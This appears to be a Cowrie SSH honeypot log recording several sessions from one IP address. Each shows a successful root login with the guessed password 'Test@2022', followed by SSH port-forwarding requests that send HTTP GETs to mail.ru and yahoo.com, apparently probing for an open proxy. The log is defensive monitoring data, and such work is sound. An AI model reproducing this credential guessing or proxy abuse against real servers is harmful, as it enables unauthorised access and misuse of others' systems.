{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":19446,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:19446","sensor":"my-vps","timestamp":"2025-08-31T03:48:24.084176Z","session":"4effa105a89e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:24.134052Z","src_ip":"77.83.207.83","session":"4effa105a89e"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:24.184547Z","src_ip":"77.83.207.83","session":"4effa105a89e"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":2997,"dst_ip":"1.2.3.4","dst_port":22,"session":"d0b9703e13cc","protocol":"ssh","message":"New connection: 77.83.207.83:2997 (1.2.3.4:22) [session: d0b9703e13cc]","sensor":"my-vps","timestamp":"2025-08-31T03:48:24.234491Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:24.244911Z","src_ip":"77.83.207.83","session":"d0b9703e13cc"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:24.285647Z","src_ip":"77.83.207.83","session":"d0b9703e13cc"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:24.539269Z","src_ip":"77.83.207.83","session":"d0b9703e13cc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":7338,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:7338","sensor":"my-vps","timestamp":"2025-08-31T03:48:24.591864Z","session":"d0b9703e13cc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:24.642849Z","src_ip":"77.83.207.83","session":"d0b9703e13cc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":14569,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:14569","sensor":"my-vps","timestamp":"2025-08-31T03:48:24.785332Z","session":"d0b9703e13cc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:24.836537Z","src_ip":"77.83.207.83","session":"d0b9703e13cc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":26840,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:26840","sensor":"my-vps","timestamp":"2025-08-31T03:48:24.981202Z","session":"d0b9703e13cc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:25.032272Z","src_ip":"77.83.207.83","session":"d0b9703e13cc"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:25.083975Z","src_ip":"77.83.207.83","session":"d0b9703e13cc"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":3068,"dst_ip":"1.2.3.4","dst_port":22,"session":"a6d837f59c03","protocol":"ssh","message":"New connection: 77.83.207.83:3068 (1.2.3.4:22) [session: a6d837f59c03]","sensor":"my-vps","timestamp":"2025-08-31T03:48:25.134181Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:25.135522Z","src_ip":"77.83.207.83","session":"a6d837f59c03"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:25.186429Z","src_ip":"77.83.207.83","session":"a6d837f59c03"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:25.439778Z","src_ip":"77.83.207.83","session":"a6d837f59c03"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":30771,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:30771","sensor":"my-vps","timestamp":"2025-08-31T03:48:25.491383Z","session":"a6d837f59c03"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:25.542284Z","src_ip":"77.83.207.83","session":"a6d837f59c03"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":1726,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:1726","sensor":"my-vps","timestamp":"2025-08-31T03:48:25.685131Z","session":"a6d837f59c03"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:25.736112Z","src_ip":"77.83.207.83","session":"a6d837f59c03"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":30966,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:30966","sensor":"my-vps","timestamp":"2025-08-31T03:48:25.885243Z","session":"a6d837f59c03"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:25.936224Z","src_ip":"77.83.207.83","session":"a6d837f59c03"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:25.987946Z","src_ip":"77.83.207.83","session":"a6d837f59c03"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":3144,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf5232ee442a","protocol":"ssh","message":"New connection: 77.83.207.83:3144 (1.2.3.4:22) [session: cf5232ee442a]","sensor":"my-vps","timestamp":"2025-08-31T03:48:26.037121Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:26.037847Z","src_ip":"77.83.207.83","session":"cf5232ee442a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:26.088410Z","src_ip":"77.83.207.83","session":"cf5232ee442a"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:26.339279Z","src_ip":"77.83.207.83","session":"cf5232ee442a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":29616,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:29616","sensor":"my-vps","timestamp":"2025-08-31T03:48:26.390694Z","session":"cf5232ee442a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:26.441109Z","src_ip":"77.83.207.83","session":"cf5232ee442a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":24901,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:24901","sensor":"my-vps","timestamp":"2025-08-31T03:48:26.584713Z","session":"cf5232ee442a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:26.634996Z","src_ip":"77.83.207.83","session":"cf5232ee442a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":13686,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:13686","sensor":"my-vps","timestamp":"2025-08-31T03:48:26.776648Z","session":"cf5232ee442a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:26.826929Z","src_ip":"77.83.207.83","session":"cf5232ee442a"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:26.878058Z","src_ip":"77.83.207.83","session":"cf5232ee442a"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":3229,"dst_ip":"1.2.3.4","dst_port":22,"session":"1540eacc0039","protocol":"ssh","message":"New connection: 77.83.207.83:3229 (1.2.3.4:22) [session: 1540eacc0039]","sensor":"my-vps","timestamp":"2025-08-31T03:48:26.926563Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:26.927231Z","src_ip":"77.83.207.83","session":"1540eacc0039"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:26.977505Z","src_ip":"77.83.207.83","session":"1540eacc0039"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:27.226344Z","src_ip":"77.83.207.83","session":"1540eacc0039"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":3382,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:3382","sensor":"my-vps","timestamp":"2025-08-31T03:48:27.277176Z","session":"1540eacc0039"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:27.327169Z","src_ip":"77.83.207.83","session":"1540eacc0039"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":29178,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:29178","sensor":"my-vps","timestamp":"2025-08-31T03:48:27.468315Z","session":"1540eacc0039"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:27.518262Z","src_ip":"77.83.207.83","session":"1540eacc0039"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":1081,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:1081","sensor":"my-vps","timestamp":"2025-08-31T03:48:27.660219Z","session":"1540eacc0039"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:27.710954Z","src_ip":"77.83.207.83","session":"1540eacc0039"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:27.762017Z","src_ip":"77.83.207.83","session":"1540eacc0039"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":3305,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea32d1e1035d","protocol":"ssh","message":"New connection: 77.83.207.83:3305 (1.2.3.4:22) [session: ea32d1e1035d]","sensor":"my-vps","timestamp":"2025-08-31T03:48:27.810565Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:27.819581Z","src_ip":"77.83.207.83","session":"ea32d1e1035d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:27.860663Z","src_ip":"77.83.207.83","session":"ea32d1e1035d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:28.109379Z","src_ip":"77.83.207.83","session":"ea32d1e1035d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":12100,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:12100","sensor":"my-vps","timestamp":"2025-08-31T03:48:28.160544Z","session":"ea32d1e1035d"}
